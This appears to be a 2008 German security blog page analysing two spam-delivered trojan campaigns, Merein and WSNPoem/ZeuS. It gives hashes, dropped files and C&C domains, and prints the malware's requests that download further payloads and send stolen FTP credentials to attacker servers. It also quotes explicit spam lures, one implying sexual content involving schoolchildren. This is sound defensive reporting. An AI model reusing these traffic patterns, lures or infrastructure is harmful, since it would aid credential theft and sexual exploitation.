Search Results for 'UATelecom'

Page 2 of 4

Porno-Mails verbreiten Malware in der Schweiz

Seit dem frühen Morgen verbreitet sich der Trojaner Merein (TrendMicro / Sophos) über eine Spam-Welle, welche auf Schweizer Benutzer abzielt. Der E-Mail Text sowie der Betreff ist jeweils auf deutsch verfasst:

Betreff: Blasen mit Madonna

Die erste Seite in der Schweiz, wo es Promis vor der Kamera treiben! Die junge Madonna mit einem prallen Schwengel im Mund oder die skandalösen Clips mit Britney Spears beim Sexspiel vor laufender Kamera! Aber auch Stars aus der Schweiz sind dabei! Und eine ganze Menge davon! Nur bei uns! HEISSE VIDEOS MIT PROMIS!

http://www.schoolswitzerland.com

Betreff sowie die angegebene URL im E-Mail Text variieren.

Domains:

  • schoolswitzerland.com (115.126.2.160)
  • switzerlandgirl.eu (115.126.2.160)
  • switzerlandpussy.eu (115.126.2.160)
  • Betreff:

  • Britney Spears vor der Pornokamera – Skandal!
  • Promiporn
  • Blasen mit Gillian Anderson – Video
  • Junge Portugiesinnen brennen vor Verlangen
  • Blasen mit Madonna
  • Bumsen und Blasen in heissen portugiesischen Stadten
  • Stars gehen am Pornohimmel auf
  • Der Empfänger der E-Mail wird dazu verleitet, auf den im Spam-Mail angegebenen Link zu klicken. Die Webseite nennt sich PornTube und beinhaltet angeblich pornografisches Material. Wird auf ein Bild auf der Webseite geklickt, wird der Besucher dazu aufgefordert, ein Adobe Flash Player HD Plugin zu installieren um den Inhalt anschauen zu können:

    Klickt der Besucher auf CLICK HERE TO DOWNLOAD THE FULL VIDEO ADOBE FLASH PLAYER HD PLUGIN, bekommt er die ausführbare Datei patch_downloader.exe. Die Datei beinhaltet einen Trojaner namens Merein (TrendMicro / Sophos):

    Filename: patch_downloader.exe
    File size: 5436 bytes
    MD5…: 21cefa95951a4c0a5d96be750d9a5f3c
    SHA1..: f5cb1cd9211f79fe819d9d82a0a536c2ac7a014a
    Erkennungsrate: 21/38 (55.26%)

    Wird die Datei patch_downloader.exe ausgeführt, installiert sich der Trojaner auf das System:

    C:\WINDOWS\9129837.exe
    C:\WINDOWS\new_drv.sys

    Als erstes bekommt der Benutzer die Meldung Please, restart your browser!. Im Hintergrund kontaktiert der Trojaner bereits einen C&C Server (hot-sexpt.com 115.126.2.160):

    GET hot-sexpt.com/sutra/in.cgi?2

    Dabei bekommt der installierte Trojaner die Anweisung vom C&C Server weiteren Schadcode herunter zu laden:

    HTTP/1.1 302 Found
    Location: http://hot-sexpt.com/305.exe
    Transfer-Encoding: chunked
    Content-Type: text/html

    document moved http://hot-sexpt.com/305.exe

    Die Datei 305.exe enthält wiederum einen Trojaner:

    Filename: 305.exe
    File size: 53248 bytes
    MD5…: c3c151386dc4b4d3495bffac9344dc80
    SHA1..: 9d72c08500aee50a84c9781dbe09c328812c6ffe
    Erkennungsrate: 3/38 (7.89%)

    Danach meldet sich der Trojaner bei einem weiteren Server (empresalda.com 91.203.92.103):

    POST http://empresalda.com/cgi-bin/pstore.cgi

    Und wieder einmal zeigen die Spuren zur UATelecom (91.203.92.103, siehe frühere Posts).

    Hat sich der Trojaner einmal eingenistet, versucht dieser FTP-Logins mit zu schneiden und die Zugangsdaten zu stehen:

    POST empresalda.com/cgi-bin/forms.cgi HTTP/1.1

    URL: sniffer_ftp_***.ch
    ftp_server=ftp.****.ch&ftp_login=anonymous&ftp_pass=IEUser@&version=0

    Fazit

    Den Empfängern solcher E-Mails wird dringen angeraten, das E-Mail unverzüglich zu löschen und auf keinen Fall das auf den Webseiten angepriesene Adobe Plugin herunter zu laden. Unternehmen sollten es des Weiteren in Betracht ziehen, folgende Domains bzw. IP-Adressen an den zentralen Gateways zu blockieren:

  • 91.203.92.103 (UATelecom)
  • 115.126.2.160 (First Network Communications Hong Kong)
  • schoolswitzerland.com
  • switzerlandgirl.eu
  • switzerlandpussy.eu
  • hot-sexpt.com
  • empresalda.com
  • UPDATE 10:45 Uhr

    Es handelt sich um den selben Trojaner, welche bereits am 25. Oktober 2008 in den USA gesichtet wurde (Siehe Post Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins). Auch diesmal stiehlt der Trojaner nicht nur FTP Zugangsdaten sondern auch diejenigen, welche über HTTP / HTTPS übertragen werden (z.B. beim OnlineBanking).

    UPDATE 20:04 Uhr

    Die Melde- und Analysestelle Informationssicherung (MELANI) hat heute Nachmittag noch eine entsprechende Information herausgegeben:

    Information: E-Mail-Welle mit dem Ziel, Schweizer Computer zu infizieren

    UPDATE 12. Dezember 2008

    Die Spam-Welle scheint nicht abzuklingen. Auch in den letzten Tagen wurde massenweise solcher Spam-Mails verschickt. Hier noch ein exemplar:

    Hallo! Wir sind absolut neu! Und nur für Dich! Du findest uns im Netz unter der Adresse … Bei uns findest Du Videos und heiße Bilder für jeden Geschmack, auch Hardcore, Natursekt, Sodomie und vieles andere mehr! Absolut geil! Lass Deiner Phantasie freien Lauf! Auch Pornoklassiker aus den 70ern und 80ern, jede Menge! Komm rein und leg los! Dem Download sind keine Grenzen gesetzt!

    http://www.sexswitzerland.eu

    Betreff:

  • Ficken ohne Grenzen
  • Videos – nur das Beste!
  • Die erste offizielle und kostenlose Pornoseite in der Schweiz
  • Das beste an Prono im Schweizer Internet
  • Das wahnsinnige Blaskonzert
  • Die beste Sammlung von Pornofilmen
  • Geile Filme fur jeden perversen Geschmack
  • Schuler in Schweizer Schulen besorgen es sich selbst und in der Gruppe
  • Weiter domains, welche derzeit aktiv den Trojaner verbreiten:

  • sexswitzerland.eu (115.126.2.160)
  • bigporno.eu (115.126.2.160)
  • fuckanal.eu (115.126.2.160)
  • bigpornosex.eu (115.126.2.160)
  • WSNPoem: UPSInvoice_90001.exe

    Obschon vor Kurzem drei Kriminelle verhaftet wurden, die für WSNPoem Angriffe auf Banken verantwortlich sind (Siehe Artikel “WSNPoem: Täter verhaftet?”), bedienen sich andere Gangs weiterhin dieses Trojaners. Dabei sind zahlreiche unterschiedliche Varianten im Spiel, die alle von ein und derselben Software namens ZeuS abstammen (Siehe “EULA & Anleitung von wsnpoem”), sich in den Details jedoch unterscheiden. Im Fadenkreuz dieser Gruppierungen stehen im Moment vor allem Ziele im Ausland, vor allem Banken, aber auch soziale Netze wie Facebook oder E-Mail-Dienste. In Europa scheinen Spanien und Italien besonders interessant zu sein, es haben sich aber auch Gruppierungen gebildet, die sich auf Australien und erstaunlicherweise sogar Russland konzentrieren. Im aktuellen Fall habe ich eine Spam-Welle in Deutschland gesichtet, dort verbreitet sich WSNPoem heute über eine neue Spam-Welle:

    From: “United Postal Service” support@ups.com
    Betreff: Your Tracking # *number*

    Sorry, we were not able to deliver postal package you sent on November the 1st in time
    because the recipient’s address is not correct.
    Please print out the invoice copy attached and collect the package at our office.
    If you do not receive package in ten days you will have to pay 36$ per day.

    Your UPS

    Im Attachement UPSInvoice_90001.zip befindet sich die ausführbare Datei UPSInvoice_90001.exe:

    Filename: UPSInvoice_90001.exe
    File size: 69120 bytes
    MD5…: f196e47b6b77a5c49ac8b70b591e5c1d
    SHA1..: b17edc29d80436c49e491e7ddc0be495c8b75f28
    Erkennungsrate: 4/36 (11.12%)

    Interessant an dem Bankentrojaner ist vor allem, dass er sich einmal mehr unter einem anderem Namen im System einnistet:

    C:\WINDOWS\system32\twain_32
    C:\WINDOWS\system32\twext.exe
    C:\WINDOWS\system32\twain_32\local.ds.cla
    C:\WINDOWS\system32\twain_32\user.ds

    Hier noch kurz eine Übersicht, über die bisherigen verschiedenen Varianten von WSNPoem:

    Beschreibung Variante 1 Variante 2 Variante 3
    Directory wsnpoem sysproc64 twain_32
    File ntos.exe oembios.exe twext.exe
    File audio.dll sysproc86.sys local.ds.cla
    File video.dll sysproc32.sys user.ds

    Nun holt sich der Trojaner wie gewohnt seine aktuelle Konfiguration von einem WSNPoem Server (C&C), welche sich meistens im Netzwerk der UATelecom befinden (91.203.92.0/22).

    Hier eine kleine Liste der Domains, welche die verschiedenen WSNPoem Varianten der letzten Monate kontaktiert hat sowie welche aktiv sind und welche inaktiv:

    Domain Reg. date A Record Aktiv/Inaktiv
    bmwx6foreva.ru 2008-09-06 91.203.93.29 Aktiv
    ddtfff.ru 2008-10-17 91.203.93.29 Aktiv
    cosmo9998.ru 2008-04-15 - Inaktiv
    cosmo6766.ru ? - Inaktiv
    productthere.ru 2007-12-22 - Inaktiv
    filmstvouty.info 2008-05-13 - Inaktiv
    reservpptppp20.ru 2008-11-05 91.203.93.29 Aktiv
    d3m0n.jino-net.ru ? 217.107.217.27 Aktiv
    popokimoki.com 2008-10-16 62.176.17.85 Aktiv
    pavelmoous.ru 2008-10-17 91.203.93.29 Aktiv
    panelstop.cn 2008-10-21 209.160.20.34 Aktiv
    naszza-klasa.cn 2008-07-16 - Inaktiv

    Nach erfolgreicher Infektion installiert der Trojaner wie gewohnt jeweils noch eine Rouge Software (AntivirusPro 2009):

    GET http://sosfichier.com/img/install.exe

    Filename: install.exe
    MD5: c45c040fba31f33c4a29a154e227b16d
    SHA1: 418d4aa13eeff7de70950f30a6b2c7bed6286a0e
    Erkennungsrate: 16/36 (44.44%)

    Fazit

    Für Firmen ist es sicher empfehlenswert, die oben genannten URLs an ihren Gateways zu blockieren. Wer sich bereits mit dem Bankentrojaner WSNPoem sowie der Rogue Software infiziert hat, sollte einen Blick in meine Anleitung “Entfernen von WSNPoem” werfen.




    economics-recluse
    Scene
    Urgent!